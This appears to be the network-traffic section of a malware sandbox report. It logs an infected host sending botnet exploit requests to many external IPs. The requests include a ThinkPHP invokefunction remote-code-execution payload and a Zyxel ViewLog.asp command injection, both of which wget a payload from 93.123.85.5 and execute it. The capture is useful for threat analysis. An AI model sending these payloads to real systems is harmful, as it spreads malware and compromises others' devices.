                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              198192.168.2.234277095.100.139.13980
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:38.485049009 CET4799OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:38.832247019 CET4838INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Expires: Mon, 13 Nov 2023 21:18:38 GMT
                                                              Date: Mon, 13 Nov 2023 21:18:38 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 65 38 36 62 61 35 64 26 23 34 36 3b 31 36 39 39 39 31 30 33 31 38 26 23 34 36 3b 37 65 36 39 32 30 62 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;de86ba5d&#46;1699910318&#46;7e6920bf</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              199192.168.2.234278095.85.126.3080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:38.526323080 CET4799OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              2192.168.2.234261294.120.235.368080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:00.692297935 CET389OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              20192.168.2.2357416112.125.173.15480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:03.441617012 CET666OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:03.754415035 CET678INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:13:25 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              200192.168.2.234628494.120.32.1408080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:38.595407963 CET4801OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              201192.168.2.234689031.200.118.1698080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:38.602684975 CET4802OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              202192.168.2.233426894.182.48.918080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:38.966299057 CET4910OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:39.365760088 CET4920INHTTP/1.1 501 Not Implemented
                                                              Cache-Control: no-store
                                                              Connection: close
                                                              Content-Length: 111
                                                              Content-Type: text/html
                                                              Date: Mon, 13 Nov 2023 21:18:52 GMT
                                                              Expires: 0
                                                              Pragma: no-cache
                                                              X-Frame-Options: sameorigin
                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 35 30 31 20 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 35 30 31 20 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 68 31 3e 0a
                                                              Data Ascii: <!doctype html><html lang=en><title>Error 501 : Not Implemented</title><h1>Error 501 : Not Implemented</h1>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              20395.85.126.3080192.168.2.2342804
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:39.303174973 CET4918INHTTP/1.0 400 Bad request
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>
                                                              Nov 13, 2023 22:18:40.677450895 CET5041INHTTP/1.0 400 Bad request
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>
                                                              Nov 13, 2023 22:18:43.215648890 CET5391INHTTP/1.0 400 Bad request
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>
                                                              Nov 13, 2023 22:18:48.106060028 CET5993INHTTP/1.0 400 Bad request
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>
                                                              Nov 13, 2023 22:18:57.665137053 CET7095INHTTP/1.0 400 Bad request
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              204192.168.2.233874831.136.43.1128080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:39.700040102 CET5006OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:40.688199043 CET5042OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:42.672049046 CET5272OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:46.863512993 CET5856OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:54.798322916 CET6828OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:10.668298006 CET8737OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:42.664161921 CET12623OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              205192.168.2.233321894.120.105.788080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:39.700105906 CET5007OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:41.456131935 CET5157OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:43.535813093 CET5399OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:47.887240887 CET5978OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:56.334157944 CET6969OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:13.995824099 CET9182OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:48.807235003 CET13472OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              206192.168.2.234510285.113.217.1428080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:39.719429970 CET5007OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:40.086621046 CET5031INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html
                                                              Server: httpd
                                                              Date: Mon, 13 Nov 2023 21:18:39 GMT
                                                              Connection: close
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Cache-Control: post-check=0, pre-check=0
                                                              Pragma: no-cache
